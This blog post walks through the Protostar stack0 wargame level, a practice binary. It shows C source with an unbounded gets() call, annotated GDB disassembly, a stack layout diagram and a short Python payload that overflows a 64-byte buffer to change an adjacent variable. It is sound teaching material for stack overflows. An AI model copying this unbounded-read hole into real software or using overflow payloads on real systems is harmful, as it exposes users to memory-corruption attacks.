# Binary Exploitation Protostar Stack0 - Walkthrough

Posted by Suraj Singh on April 04, 2018 · 6 mins read
Hello Guys,

In this post, I am going to show you how we can beat the Protostar stack0 level. Basically, our main goal here is to understand how a program practically works, and to understand every concept very clearly.

#### Before starting this walkthrough, I want to highlight a few points.

• I'm not the creator of the Protostar wargame. I am just a player.
• Here, I am just providing you hints and references, so that if you feel stuck anywhere, you can take a look here.
• For a practical hint, check the YouTube video given below.

### Source Code

```c
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  modified = 0;
  gets(buffer);            /* unbounded read: this is the overflow the level is about */

  if(modified != 0) {
      printf("you have changed the 'modified' variable\n");
  } else {
      printf("Try again?\n");
  }
}
```

### Disassembly Of Main Function (Using GDB)

```
########################################################################################################
          [ The program reserves 0x60 bytes (96 in decimal) of space on the stack ]
########################################################################################################
[-------------------------------------code-------------------------------------]
   0x80483f5 <main+1>:  mov    ebp,esp                     <<=== Set up the base pointer for main's frame
   0x80483f7 <main+3>:  and    esp,0xfffffff0              <<=== Align the stack pointer to 16 bytes
   0x80483fa <main+6>:  sub    esp,0x60                    <<=== Reserve 0x60 = 96 bytes of stack space
=> 0x80483fd <main+9>:  mov    DWORD PTR [esp+0x5c],0x0    <<=== modified = 0 (bytes 92-96 of the frame)
   0x8048405 <main+17>: lea    eax,[esp+0x1c]              <<=== Load the address of buffer (offset 28 from esp)
                                                                 into EAX; it is then placed on the stack as
                                                                 the argument for gets()
   0x8048409 <main+21>: mov    DWORD PTR [esp],eax         <<=== Copy EAX onto the stack (first argument)
   0x804840c <main+24>: call   0x804830c <gets@plt>        <<=== Call gets(buffer)
   0x8048411 <main+29>: mov    eax,DWORD PTR [esp+0x5c]    <<=== Load the value of modified (bytes 92-96) into EAX
```

### Situation On Stack

```
0                        28                                                      92        96
============================================================================================
      Other Things       |  Buffer(64)                                           | modified |
============================================================================================
                         ^                                                            ^
                         |                                                            |
             gets() overwrites from here                                          Target Area
```

### Exploit

```python
#!/usr/bin/python
# Total size of main's stack frame: 0x60 = 96 bytes
# 0x80483fa <main+6>:  sub    esp,0x60                  ==> 96 in decimal
# 0x8048405 <main+17>: lea    eax,[esp+0x1c]            ==> buffer starts at offset 28
# 0x804840c <main+24>: call   0x804830c <gets@plt>      ==> unbounded read into buffer
# 0x80483fd <main+9>:  mov    DWORD PTR [esp+0x5c],0x0  ==> modified sits at offset 92 = 28 + 64
payload = 'a' * 64           # fills the 64-byte buffer variable
payload += 'b' * 4           # overwrites the 4-byte modified variable
# Usage: python exploit.py > tmp ; ./bin/stack0 < tmp
print(payload)
```